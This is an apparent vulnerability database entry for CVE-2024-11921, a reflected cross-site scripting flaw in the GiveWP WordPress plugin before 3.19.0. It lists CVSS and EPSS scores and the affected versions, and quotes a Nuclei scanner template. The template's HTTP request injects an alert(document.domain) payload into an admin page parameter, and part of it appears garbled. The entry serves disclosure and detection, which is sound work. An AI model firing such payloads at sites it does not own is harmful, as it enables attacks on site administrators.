CVE-2024-11921
published 2024-12-27CVE-2024-11921: The GiveWP WordPress plugin before 3.19.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site…
PriorityP421medium4.8CVSS 3.1
AVNACLPRHUIRSCCLILAN
EXPLOIT
EPSS
0.79%
51.8th percentile
The GiveWP WordPress plugin before 3.19.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| givewp | givewp | < 3.19.0 | 3.19.0 |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Give WP Plugin < 3.19.0 - Cross-Site Scripting
nuclei·CVSS 4.8
CVE-2024-11921 [MEDIUM] Give WP Plugin < 3.19.0 - Cross-Site Scripting
Give WP Plugin alert(document.domain) HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-admin/admin.php?page=give-forms&give-clear-update=1">alert(document.domain) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "alert(document.domain)", "give_forms_page_")'
condition: and
# digest: 4a0a004730450220432a5649f5b73be7b8a0d6161e5c35f3e97924a96d198ae1cf050272d310bc5c022100cb6f3bd298d1110d7d90f56a1b13d1320f42b606e2feef1d3c509aeb505426ed:922c64590222798bb761d5b6d8e72950
2024-12-27
Published